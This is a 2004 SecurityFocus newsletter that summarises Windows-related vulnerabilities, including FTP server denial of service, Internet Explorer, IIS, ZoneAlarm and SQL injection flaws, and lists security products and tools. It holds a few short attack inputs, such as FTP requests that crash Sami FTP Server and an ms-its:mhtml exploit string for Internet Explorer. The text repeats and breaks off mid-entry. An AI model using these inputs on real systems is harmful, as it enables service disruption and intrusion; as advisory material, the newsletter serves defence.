SecurityFocus Microsoft Newsletter #177
----------------------------------------
I. FRONT AND CENTER
1. Automating Windows Patch Mngt: Part II
2. Knock, Knock, Knock
II. MICROSOFT VULNERABILITY SUMMARY
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
2. Microsoft Internet Explorer Unspecified CHM File Processing ...
3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
5. EarlyImpact ProductCart Multiple Vulnerabilities
6. RobotFTP Server Username Buffer Overflow Vulnerability
7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
8. YABB SE Quote Parameter SQL Injection Vulnerability
9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
10. YaBB Information Leakage Weakness
11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
12. Microsoft Windows XP Help And Support Center Interface Spoof...
13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
16. AOL Instant Messenger Buddy Icon Predictable File Location W...
III. MICROSOFT FOCUS LIST SUMMARY
1. Controlling Admin Access (Thread)
2. Preventing OS Detection (Thread)
3. SecurityFocus Microsoft Newsletter #176 (Thread)
4. PPTP versus L2TP and possible attacks (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Norton Internet Security 2004
2. Dekart Logon
3. AppSentry
4. AppDefend
5. Airscanner Mobile AntiVirus Pro
6. Symantec?s Norton Internet Security 2004 Professional
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. GeneSyS v1.0
2. aNTG v2.1
3. Stunnel v4.05
4. Airscanner Mobile AntiVirus Pro v2.5
5. FileWatch v1.0
6. Enigmail v0.83.2
VI. UNSUBSCRIBE INSTRUCTIONS
I. FRONT AND CENTER
-------------------
1. Automating Windows Patch Mngt: Part II
By Jonathan Hassell
In this segment of the Windows Patch Management series, you'll learn what
happens on the client
computers when SUS is active, how to monitor the client's patching
activities, and how to fix or
work around some common problems.
http://www.securityfocus.com/infocus/1762
2. Knock, Knock, Knock
By Kelly Martin
If hundreds of thousands of people are still blindly clicking on
attachments in their email,
is there any hope of mitigating the threat of hundreds of thousands of
compromised systems
with open backdoors?
http://www.securityfocus.com/columnists/221
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
BugTraq ID: 9657
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9657
Summary:
Sami FTP Server is an FTP server solution for Microsoft Windows platforms.
Sami FTP Server has been reported prone to multiple remote denial of
service vulnerabilities. It has been reported that an attacker who has
sufficient credentials to access a vulnerable server, may cause the
pmsystem.exe executable to raise a fatal exception by making unexpected
FTP requests.
The following requests will trigger an exception in the affected server,
causing the software to fail.
cd ~
cd /../
get %Filename that does not exist%
ftp://user:pass (at) ftp.example (dot) com [email concealed]////
A remote attacker may exploit these vulnerabilities to deny service to
legitimate users of the FTP server.
2. Microsoft Internet Explorer Unspecified CHM File Processing ...
BugTraq ID: 9658
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9658
Summary:
Microsoft Internet Explorer has been reported prone to an unspecified
vulnerability when handling CHM files. The issue is reportedly exploitable
to provide for automatic delivery and execution of an arbitrary
executable. This would occur when malicious web content is rendered in
Internet Explorer.
The issue is believed to be a variant of the vulnerabilities described in
BID 9107 (Microsoft Internet Explorer Browser MHTML Redirection Local File
Parsing Vulnerability) and BID 9105 (Microsoft Internet Explorer MHTML
Forced File Execution Vulnerability), in this case however MHTML
redirection occurs through the MS-ITS InfoTech Protocol. The
vulnerability is reportedly exploited with the following syntax:
It is conjectured that this could be used to cause a hostile CHM file to
be executed in the context of the Local Zone on a client system.
It has been reported that this vulnerability is actively being exploited
as an infection vector for malicious code that has been temporarily dubbed
'Ibiza'.
According to new information, by employing a malformed CLSID parameter
this vulnerability may allow malicious applications to be downloaded
without user intervention.
3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
BugTraq ID: 9660
Remote: Yes
Date Published: Feb 14 2004
Relevant URL: http://www.securityfocus.com/bid/9660
Summary:
Microsoft IIS is a web server implementation for Microsoft Windows
systems.
Microsoft IIS has been reported prone to a remote denial of service
vulnerability. It has been reported that an exploit developed as a
proof-of-concept for the issues described in BID 8732(OpenSSL ASN.1
Parsing Vulnerabilities), when invoked against Microsoft IIS 5.0, will
trigger a denial of service. Specifically, when processing the exploit
data LSASS.EXE reportedly consumes system memory resources in an
exponential manner until it finally fails.
Although unconfirmed this issue may be related to the issues described in
BID 9633 (Microsoft ASN.1 Library Length Integer Mishandling Memory
Corruption Vulnerability) and BID 9635 (Microsoft Windows ASN.1 Library
Bit String Processing Integer Handling Vulnerability).
An attacker may potentially exploit this condition to deny HTTPS service
to legitimate users.
This issue is reported to affect Microsoft Windows 2000 Server (Korean
Release) + IIS 5.0, other versions might also be affected.
This BID will be updated, as further analysis of this issue is complete.
4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
BugTraq ID: 9663
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9663
Summary:
Microsoft Internet Explorer has been reported prone to an integer overflow
vulnerability. The issue presents itself in bitmap file processing
procedures and is due to the use of a signed integer employed during
boundary checking routines.
An attacker may reportedly create a malicious bitmap that is crafted in a
manner to cause the affected integer to wrap to a negative value when the
malicious bitmap file is processed. When this integer is later used in a
procedure to read data into a 1024 byte buffer, the procedure may read
excessive data into the buffer invariably resulting in a stack buffer
overflow. Ultimately an attacker may exploit this condition to corrupt a
saved instruction or stack frame base pointer, to influence execution flow
of the affected browser into attacker-supplied instructions.
This vulnerability has been reported to affect Internet Explorer version
5, other versions may also be affected. Internet Explorer version 6 is
reported not vulnerable to this issue.
This issue could also be exposed via other software that uses Internet
Explorer to render images, such as Outlook, though this has not been
confirmed.
5. EarlyImpact ProductCart Multiple Vulnerabilities
BugTraq ID: 9669
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9669
Summary:
EarlyImpact ProductCart is e-commerce software that is implemented in ASP
and available for Microsoft Windows systems.
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities.
The specific issues include SQL injection, cross-site scripting and
cryptographic weaknesses. These issues could expose sensitive data such
as user credentials and allow for execution of hostile script code and
HTML. These issues could allow for full compromise of the software.
The following specific issues were reported:
A cryptographic weakness in the user credential encryption routines was
reported. In particular, the keystream used for the stream cipher is
prone to a chosen plaintext attack. Credentials are encrypted (and
decrypted) using a bitwise XOR operation with the keystream and the
plaintext or ciphertext (respective to whether the data is being encrypted
or decrypted). If the keystream can be determined, then it is trivial to
decrypt credentials for customers and administrators of the software. The
attacker would of course be required to have prior access to this data,
but this may be accomplished through exploitation of the SQL injection
vulnerability described below.
An SQL injection vulnerability has been reported in the advSearch_h.asp
script. Data supplied via URI parameters to this script will be used
directly in SQL queries without adequate input validation. This could
allow for various attacks, such as disclosing encrypted user credentials
(which could be decrypted via the previously mentioned cryptographic
weakness). Other attacks are also possible.
A cross-site scripting issue was reported in the Custva.asp script. Input
supplied to the 'redirectUrl' URI parameter will be included in
dynamically generated pages without adequate sanitization of HTML and
script code. An attacker could exploit this issue by embedding hostile
HTML and script code via this parameter in a malicious link. If
unsuspecting users following this link, the attacker-supplied code may be
rendered in the web browser in the security context of the site. This
could be exploited to steal cookie-based authentication credentials or to
mount other attacks.
6. RobotFTP Server Username Buffer Overflow Vulnerability
BugTraq ID: 9672
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9672
Summary:
RobotFTP Server is an FTP Server for Microsoft Windows operating systems.
A vulnerability has been reported for RobotFTP Server. The problem likely
occurs due to insufficient bounds checking when processing 'USER' command
arguments of excessive length.
By exploiting this issue to modify sensitive stack variables, an anonymous
remote attacker may be capable of exploiting this issue to execute
arbitrary code. This however has not been confirmed. Failed exploit
attempts may result in a denial of service.
7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
BugTraq ID: 9673
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9673
Summary:
Microsoft Outlook Express uses Internet Explorer to render HTML e-mail and
newsgroup messages by default. A vulnerability may exist in the software
that may allow a remote attacker to execute arbitrary applications on a
vulnerable system. This issue may be exploited by embedding an object in
an HTML e-mail. It may be possible for an attacker to place a file in a
known folder through other means and have it executed through this method.
Due to a lack of information, further details are not available at the
moment. This BID will be updated as more information becomes available.
This issue may be related to the vulnerability described as Microsoft
Outlook and Outlook Express Arbitrary Program Execution Vulnerability (BID
6923).
8. YABB SE Quote Parameter SQL Injection Vulnerability
BugTraq ID: 9674
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9674
Summary:
YaBB SE is a freely available, open source port of Yet Another Bulletin
Board (YaBB). It is available for Unix, Linux, and Microsoft Operating
Systems.
A vulnerability in YaBB SE could make it possible for a remote user to
launch SQL injection attacks.
It has been reported that the issue exists due to insufficient sanitizing
of the 'quote' URI parameter, it is possible for a remote user to inject
arbitrary SQL queries into the database used by YaBB SE. This could permit
remote attackers to pass malicious input to database queries, resulting in
modification of query logic or other attacks.
Successful exploitation could result in compromise of the YaBB SE,
disclosure or modification of data or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.
Proof of concept supplied within the reported allows an attacker to gain
access to users' password hash.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this
issue, however, other versions could be affected as well.
9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
BugTraq ID: 9675
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9675
Summary:
RhinoSoft Serv-U FTP Server is designed for use with Microsoft Windows
operating systems.
RhinoSoft Serv-U FTP Server has been reported prone to a remote
post-authentication buffer overflow vulnerability.
The vulnerability is reported to exist when a malicious filename argument
is passed to the SITE CHMOD command. It has been reported that excessive
data passed to the SITE CHMOD command in this manner, will overrun the
bounds of a reserved buffer in memory. This will ultimately result in the
two least significant bytes of a saved pointer value being corrupted with
attacker-supplied values.
An attacker may potentially exploit this condition to control the location
of write into a somewhat limited range of memory. The immediate
consequences of this may be a denial of service. Although unconfirmed it
may be possible for an attacker to leverage this condition to have
arbitrary code executed in the context of the affected service.
This issue is not dependant on write permission on the affected FTP
server.
10. YaBB Information Leakage Weakness
BugTraq ID: 9677
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9677
Summary:
YaBB (Yet Another Bulletin Board) is freely available web forum software
that is written in Perl. YaBB will run on most Unix/Linux variants, Mac
OS, and Microsoft Windows platforms.
YaBB is prone to a weakness that may permit remote users to enumerate
usernames. The cause of this issue is that YaBB returns different
responses based on whether or not a guessed username is valid or invalid
when the user attempts to log in. This information could aid in further
attacks.
It should be noted that this issue would only present a security risk on
installations that do not allow guests or anonymous web users to browse
the forum, in which case remote users would not be privy to usernames.
Otherwise this information would already be publicly accessible.
This issue was reported in YaBB 1 Gold - SP 1.3.1. Other versions may
also be affected.
11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
BugTraq ID: 9682
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9682
Summary:
Ipswitch IMail is an e-mail server that serves clients their mail via a
web interface. It runs on Microsoft Windows operating systems. IMail ships
with an LDAP daemon.
The Ipswitch LDAP daemon has been reported prone to a remote buffer
overflow vulnerability. The vulnerability exists due to a lack of
sufficient boundary checks performed on user supplied LDAP tags. When
attacker-supplied data containing large LDAP tags is processed by the
affected service, a stack based buffer overflow condition will be
triggered. An attacker may exploit this condition to control variables
that are used as an offset from the active stack frame pointer, in a write
operation as follows:
mov byte ptr [ebp+ecx+var_4], dl
Because the location of the write is controlled, the remote attacker may
overwrite the Global Exception Handler to ultimately redirect the
execution flow of the affected service into attacker-supplied
instructions. The attacker's payload would be executed in the security
context of the affected service.
12. Microsoft Windows XP Help And Support Center Interface Spoof...
BugTraq ID: 9685
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9685
Summary:
A weakness has been alleged in Microsoft Windows XP that could reportedly
allow aspects of the Help and Support Center interface to be spoofed via a
malicious link. By spoofing this interface, an attacker could potentially
present misleading or hostile content to a user in a manner which may
cause the user to trust it. This weakness employs the connection.htm
error page to present attacker-specified web pages in the interface with
various misleading properties, such as an arbitrary title (Windows Update
is used in the example) and instructional text.
Symantec has not been able to reproduce this alleged weakness.
13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
BugTraq ID: 9693
Remote: Yes
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9693
Summary:
WebCortex WebStores2000 is shopping cart software implemented in ASP. It
is available for Microsoft Windows operating environments.
It has been reported that WebStores2000 is prone to a cross-site scripting
vulnerability. This issue is reportedly due to a failure to sanitize user
input and so allow HTML and script code that may facilitate cross-site
scripting attacks.
This issue is reported to affect the 'Message_id' parameter of the
'error.asp' script.
This could permit a remote attacker to create a malicious link to the
vulnerable application that includes hostile HTML and script code. If this
link were followed, the hostile code may be rendered in the web browser of
the victim user. This would occur in the security context of the web
server and may allow for theft of cookie-based authentication credentials,
session data, or other attacks.
14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
BugTraq ID: 9694
Remote: No
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9694
Summary:
It has been reported that security exposures exist in kernel API functions
for Microsoft Windows operating systems that may permit local privilege
escalation attacks.
The primary source of these issues is that the ZwSystemDebugControl()
function exports the NtSystemDebugControl() Windows system function, which
is executed in kernel mode (ring 0). This could allow for numerous
attacks which could permit users to gain elevated privileges by executing
code in kernel context or reading from and writing to any kernel address.
These issues were reported to exist in Microsoft Windows XP but it has
been conjectured that Microsoft Windows Server 2003 may also be affected
by these issues.
It should be noted that a local user would require the SeDebugPrivilege to
exploit these flaws.
These flaws are currently pending further analysis. While only believed
to be one core vulnerability at this point (with multiple attack vectors),
it is still possible that distinct issues will be identified. In this
case, this BID will be separated into multiple BIDs accordingly.
15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
BugTraq ID: 9696
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9696
Summary:
ZoneAlarm is a firewall software package designed for Microsoft Windows
operating systems. It is distributed and maintained by Zone Labs.
A vulnerability has been identified in the software that may allow an
attacker to execute arbitrary code on a vulnerable system in order to gain
unauthorized access. The problem exists due to insufficient boundary
checking by the TrueVector Internet Monitor (vsmon.exe) process used by
various Zone Labs applications.
It has been reported that Zone Labs products process incoming and outgoing
SMTP traffic to perform various security related functions. The issue is
reportedly caused by an unchecked buffer in the Simple Mail Transfer
Protocol (SMTP) processing, therefore it presents itself remotely when the
target system is operating as an SMTP server on TCP port 25.
Specifically, the issue arises when an outgoing e-mail message is examined
and the destination e-mail address is retrieved. This vulnerability can
be exploited remotely, if an attacker is able to send an outgoing e-mail
message via the server. The attacker would send a message with an
excessively large string value in the destination e-mail address field.
By sending a large value via the destination e-mail address field to the
'RCPT TO' command argument, a stack based buffer may overflowed in the
vsmon.exe process.
The issue may also be exploited locally to gain SYSTEM level privileges if
a malicious user on the system has been given permission to access the
network by an administrator or another user. An attacker may send a
malicious e-mail sufficient to trigger and exploit this issue. Immediate
consequences of an attack may result in a denial of service condition.
Successful exploitation of this issue may allow an attacker to cause the
firewall process to crash and/or execute arbitrary code in order to gain
SYSTEM level access.
ZoneAlarm family of products and Integrity client versions 4.0 and above
are reported to be prone to this issue. Integrity Server and Integrity
Clientless Security products are not affected by this issue.
16. AOL Instant Messenger Buddy Icon Predictable File Location W...
BugTraq ID: 9698
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9698
Summary:
AOL Instant Messenger stores imported Buddy Icons in a predictable
location on client systems. Specifically, the files will be stored in the
following location on the local filesystem:
c:\documents and settings\username\application data\aim\bartcache\1
Other attacks are possible given the ability to store content on a system
in a predictable location, such as Microsoft Internet Explorer Shell:
IFrame Cross-Zone Scripting Vulnerability (BID 9628). The issue describe
in BID 9628 may allow hostile script code to access properties of an
IFrame that has been opened in the context of the My Computer Zone.
Reportedly, if an IFrame opens up a local resource using a 'shell:' link,
it may be possible for the page that spawns the IFrame to access
properties of the My Computer Zone.
The issue could be exploited via a malicious web page created by the
attacker. The attacker would then create another page that includes code
such as:
By creating a hyperlink to the malicious page and sending it to a victim
in a buddy list running AOL Instant Messenger client, this issue could
potentially allow for remote compromise of the client system in the
context of the client user. Successful exploitation would require that
the victim exists on your buddy list.
This issue has been tested on AOL Instant Messenger versions 4.3 to 5.5,
however, it is possible that other versions are affected as well.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Controlling Admin Access (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354798
2. Preventing OS Detection (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354797
3. SecurityFocus Microsoft Newsletter #176 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354204
4. PPTP versus L2TP and possible attacks (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354022
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Norton Internet Security 2004
By: Symantec
Platforms: Windows 95/98
Relevant URL: http://www.symantec.com/sabu/nis/nis_pe/
Summary:
Symantec's Norton Internet Security 2004 provides essential protection
from viruses, hackers, and privacy threats. Powerful yet easy to use, this
award-winning suite now includes advanced spam-fighting software to filter
unwanted mail out of your inbox. Protect yourself, your family, and your
PC online with Norton Internet Security 2004.
2. Dekart Logon
By:
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.dekart.com/products/authentication_access/logon/
Summary:
Dekart Logon is a solution designed to provide an additional level of
security for the Microsoft Windows operating system. Access to the Windows
environment can only be gained after inserting a USB key or smart card
into the appropriate slot and by entering the correct PIN code.
Dekart Logon offers a number of security options: you can select to have
Windows access blocked once the key is removed, during a screen saver
timeout or other user assigned prompts. This flexibility automatically
reduces the possibility of human error by maintaining predefined security
levels even if the user leaves their PC unattended.
3. AppSentry
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appsentry.htm
Summary:
AppSentry is a new generation of security scanner and vulnerability
assessment tool. Unlike other security scanners, AppSentry knows the
application it is validating ? its technology and data model. The security
audits and checks are written specifically for the application being
tested. Hackers and mischievous employees often exploit security issues at
different layers of the technology stack, thus only a complete and
comprehensive security validation will uncover all risks in a multi-tiered
environment.
The advantage of AppSentry is now you don't have to seperate tools for the
operating system, web server, and database. AppSentry is a single tool
that can validate and audit the security of the entire application
technology stack from operating system to application layer.
AppSentry is available for the following applications -
Oracle E-Business Suite (11i)
Oracle Database (8.x, 8i, 9i, 10g)
Oracle Application Server (9iAS, 10g)
SAP
PeopleSoft
Microsoft SQL Server
4. AppDefend
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appdefend.htm
Summary:
AppDefend is a new concept in Intrusion Prevention - direct application
protection. AppDefend protects the application from attacks and intrusions
by blocking attacks before they reach the application.
AppDefend is designed specifically for the application it is protecting.
Thus, when implementing for the Oracle E-Business Suite, there is no
analysis or other configuration required to provide maximum protection for
the application. Integrigy has already performed all this work for you --
all modules, all versions.
AppDefend is designed to be simple to install and easy to maintain. A
straight-forward, yet robust, implementation takes only 15 minutes. No
complex configuration or analysis of the application is required.
5. Airscanner Mobile AntiVirus Pro
By: Airscanner Corp.
Platforms: Windows CE
Relevant URL: http://airscanner.com/downloads/av/av.html
Summary:
Airscanner Mobile AntiVirus Pro will quarantine or eradicate embedded
viruses and malware, has fast, optimized scanning speed based on patent
pending technology, has automatic, online updates of virus signatures and
scanning engine as well as support for PocketPC 2003/Windows Mobile 2003
and easy online updates.
In addition to an accurate virus scanner, Airscanner Mobile AntiVirus
includes these powerful tools for debugging Trojan horses:
- Intercept memory resident viruses with an advanced process discovery
tool.
- Debug Trojan hacks with an easy-to-use registry viewer.
- Uncover denial of service attacks with a rapid system analyzer.
- Enter your own custom virus signatures (for experts).
- Perform fast, recursive, and flexibly multithreaded filesystem
scanning.
6. Symantec?s Norton Internet Security 2004 Professional
By: Symantec
Platforms: Windows 2000, Windows 95/98, Windows XP
Relevant URL: http://www.symantec.com/smallbiz/nis_pr/
Summary:
Symantec?s Norton Internet Security 2004 Professional protects you and
your business from online threats. It eliminates viruses automatically,
blocks hackers, safeguards your personal information, fights spam,
increases online productivity, recovers lost or damaged files, and
thoroughly deletes confidential data you no longer need. Available in 5
and 10-user Small Office Packs.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. GeneSyS v1.0
By: Balazs E. Pataki
Relevant URL: http://genesys.sztaki.hu
Platforms: UNIX, Windows 2000, Windows NT
Summary:
GeneSyS aims to define and implement a middleware architecture for generic
system monitoring and supervision. It is an Information Society Project
(IST-2001-34162) sponsored by the European Commission. It provides a
middleware- and agent-based approach for system monitoring and management.
It uses WebServices technology (SOAP) for communication between components
and XML-based descriptions of monitoring information.
2. aNTG v2.1
By: Lucas
Relevant URL: http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
3. Stunnel v4.05
By: Michal Trojnara, <Michal.Trojnara (at) mirt (dot) net [email concealed]>
Relevant URL: http://stunnel.mirt.net/
Platforms: FreeBSD, Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
The stunnel program is designed to work as an SSL encryption wrapper
between remote client and local (inetd-startable) or remote server. It can
be used to add SSL functionality to commonly used inetd daemons like POP2,
POP3, and IMAP servers without any changes in the programs' code. It will
negotiate an SSL connection using the OpenSSL or SSLeay libraries. It
calls the underlying crypto libraries, so stunnel supports whatever
cryptographic algorithms you compiled into your crypto package.
4. Airscanner Mobile AntiVirus Pro v2.5
By: Airscanner Corp
Relevant URL: http://airscanner.com/downloads/av/av.html
Platforms: Windows CE
Summary:
Airscanner Corporation is the most trusted name in helping to defend your
mobile device from "airborne" computer viruses. From the company that
wrote the best-selling technical book Maximum Wireless Security comes a
professional strength virus scanner for the Pocket PC.
With the increased wireless connectivity of PDAs and Smartphones comes an
increased threat from virus attacks. Save money, time, and data by
protecting your valuable Pocket PC now with Airscanner Mobile AntiVirus
Pro.
5. FileWatch v1.0
By: robinkeir (at) foundstone (dot) com [email concealed]
Relevant URL: www.foundstone.com/rdlabs/tools.html
Platforms: Windows NT
Summary:
A file change monitor. Used with BlackICE Defender. FileWatch (originally
called ICEWatch 1.x) is a small utility that can monitor a given file for
changes. Monitoring can detect file size changes or simply file writes,
both with minimal impact on system resources (no polling is performed).
The primary use of this utility is for monitoring changes in the log file
of a personal firewall program and being able to spawn a separate
application when changes are detected, but the tool can be applied to any
number of other uses.
6. Enigmail v0.83.2
By: Patrick
Relevant URL: http://enigmail.mozdev.org/thunderbird.html
Platforms: Linux, MacOS, POSIX, UNIX, Windows 2000, Windows 3.x, Windows
95/98, Windows CE, Windows NT, Windows XP
Summary:
Enigmail is a "plugin" for the mail client of Mozilla and Netscape 7.x
which allows users to access the authentication and encryption features
provided by the popular GnuPG software. Enigmail can encrypt/sign mail
when sending, and can decrypt/authenticate received mail. It can also
import/export public keys. Enigmail supports both the inline PGP format
and the PGP/MIME format, which can be used to encrypt attachments.
Enigmail is cross-platform, although binaries are supplied only for a
limited number of platforms. Enigmail uses inter-process communication to
execute GPG to carry out encryption/authentication.
VI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to
ms-secnews-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The
contents of the subject or message body do not matter. You will receive a
confirmation request message to which you will have to answer.
Alternatively you can also visit http://www.securityfocus.com/newsletters
and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and
ask to be manually removed.
----------------------------------------
I. FRONT AND CENTER
1. Automating Windows Patch Mngt: Part II
2. Knock, Knock, Knock
II. MICROSOFT VULNERABILITY SUMMARY
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
2. Microsoft Internet Explorer Unspecified CHM File Processing ...
3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
5. EarlyImpact ProductCart Multiple Vulnerabilities
6. RobotFTP Server Username Buffer Overflow Vulnerability
7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
8. YABB SE Quote Parameter SQL Injection Vulnerability
9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
10. YaBB Information Leakage Weakness
11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
12. Microsoft Windows XP Help And Support Center Interface Spoof...
13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
16. AOL Instant Messenger Buddy Icon Predictable File Location W...
III. MICROSOFT FOCUS LIST SUMMARY
1. Controlling Admin Access (Thread)
2. Preventing OS Detection (Thread)
3. SecurityFocus Microsoft Newsletter #176 (Thread)
4. PPTP versus L2TP and possible attacks (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Norton Internet Security 2004
2. Dekart Logon
3. AppSentry
4. AppDefend
5. Airscanner Mobile AntiVirus Pro
6. Symantec?s Norton Internet Security 2004 Professional
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. GeneSyS v1.0
2. aNTG v2.1
3. Stunnel v4.05
4. Airscanner Mobile AntiVirus Pro v2.5
5. FileWatch v1.0
6. Enigmail v0.83.2
VI. UNSUBSCRIBE INSTRUCTIONS
I. FRONT AND CENTER
-------------------
1. Automating Windows Patch Mngt: Part II
By Jonathan Hassell
In this segment of the Windows Patch Management series, you'll learn what
happens on the client
computers when SUS is active, how to monitor the client's patching
activities, and how to fix or
work around some common problems.
http://www.securityfocus.com/infocus/1762
2. Knock, Knock, Knock
By Kelly Martin
If hundreds of thousands of people are still blindly clicking on
attachments in their email,
is there any hope of mitigating the threat of hundreds of thousands of
compromised systems
with open backdoors?
http://www.securityfocus.com/columnists/221
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
BugTraq ID: 9657
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9657
Summary:
Sami FTP Server is an FTP server solution for Microsoft Windows platforms.
Sami FTP Server has been reported prone to multiple remote denial of
service vulnerabilities. It has been reported that an attacker who has
sufficient credentials to access a vulnerable server, may cause the
pmsystem.exe executable to raise a fatal exception by making unexpected
FTP requests.
The following requests will trigger an exception in the affected server,
causing the software to fail.
cd ~
cd /../
get %Filename that does not exist%
ftp://user:pass (at) ftp.example (dot) com [email concealed]////
A remote attacker may exploit these vulnerabilities to deny service to
legitimate users of the FTP server.
2. Microsoft Internet Explorer Unspecified CHM File Processing ...
BugTraq ID: 9658
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9658
Summary:
Microsoft Internet Explorer has been reported prone to an unspecified
vulnerability when handling CHM files. The issue is reportedly exploitable
to provide for automatic delivery and execution of an arbitrary
executable. This would occur when malicious web content is rendered in
Internet Explorer.
The issue is believed to be a variant of the vulnerabilities described in
BID 9107 (Microsoft Internet Explorer Browser MHTML Redirection Local File
Parsing Vulnerability) and BID 9105 (Microsoft Internet Explorer MHTML
Forced File Execution Vulnerability), in this case however MHTML
redirection occurs through the MS-ITS InfoTech Protocol. The
vulnerability is reportedly exploited with the following syntax:
ms-its:mhtml:file://C:\ss.MHT!http://www.yoursite.tld//chm.chm::/files/l
aunch.htm
It is conjectured that this could be used to cause a hostile CHM file to
be executed in the context of the Local Zone on a client system.
It has been reported that this vulnerability is actively being exploited
as an infection vector for malicious code that has been temporarily dubbed
'Ibiza'.
According to new information, by employing a malformed CLSID parameter
this vulnerability may allow malicious applications to be downloaded
without user intervention.
3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
BugTraq ID: 9660
Remote: Yes
Date Published: Feb 14 2004
Relevant URL: http://www.securityfocus.com/bid/9660
Summary:
Microsoft IIS is a web server implementation for Microsoft Windows
systems.
Microsoft IIS has been reported prone to a remote denial of service
vulnerability. It has been reported that an exploit developed as a
proof-of-concept for the issues described in BID 8732(OpenSSL ASN.1
Parsing Vulnerabilities), when invoked against Microsoft IIS 5.0, will
trigger a denial of service. Specifically, when processing the exploit
data LSASS.EXE reportedly consumes system memory resources in an
exponential manner until it finally fails.
Although unconfirmed this issue may be related to the issues described in
BID 9633 (Microsoft ASN.1 Library Length Integer Mishandling Memory
Corruption Vulnerability) and BID 9635 (Microsoft Windows ASN.1 Library
Bit String Processing Integer Handling Vulnerability).
An attacker may potentially exploit this condition to deny HTTPS service
to legitimate users.
This issue is reported to affect Microsoft Windows 2000 Server (Korean
Release) + IIS 5.0, other versions might also be affected.
This BID will be updated, as further analysis of this issue is complete.
4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
BugTraq ID: 9663
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9663
Summary:
Microsoft Internet Explorer has been reported prone to an integer overflow
vulnerability. The issue presents itself in bitmap file processing
